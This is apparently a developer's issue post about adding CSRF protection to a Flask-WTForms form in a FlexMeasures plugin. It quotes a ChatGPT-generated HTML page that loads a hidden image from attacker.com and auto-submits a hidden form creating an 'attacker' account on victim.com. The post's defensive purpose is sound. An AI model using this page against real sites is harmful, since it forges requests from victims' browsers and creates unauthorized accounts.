CSRF protection

[victorgarcia98]

In the process of creating a form using Flask-WTForms for a FlexMeasures plugin, I encountered the following recommendation to protect an application against CSRF attacks:

https://flask-wtf.readthedocs.io/en/0.15.x/csrf/

In summary, it consist of adding a CSRF token into the form and let the Flask-WTForms validate the data by registering the CSRFProtect Flask extension.

The CSRF protection can be disabled at the endpoint or blueprint level.

As I'm not a cybersecurity expert, I asked ChatGPT to provide me an example on how an attacker would exploit this vulnerability:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>CSRF Attack Simulation</title>
</head>
<body>

<h1>CSRF Attack Simulation</h1>

<!-- This is the victim's browser loading an image from the attacker's domain -->
<img src="http://attacker.com/csrf-attack" style="display:none;">

<!-- The attacker's form with hidden fields -->
<form action="http://victim.com/create_user" method="POST" id="csrf-form">
    <input type="hidden" name="username" value="attacker">
    <input type="hidden" name="password" value="maliciouspassword">
    <input type="submit" value="Submit Form">
</form>

<script>
    // Automatically submit the form when the page loads
    document.getElementById("csrf-form").submit();
</script>

</body>
</html>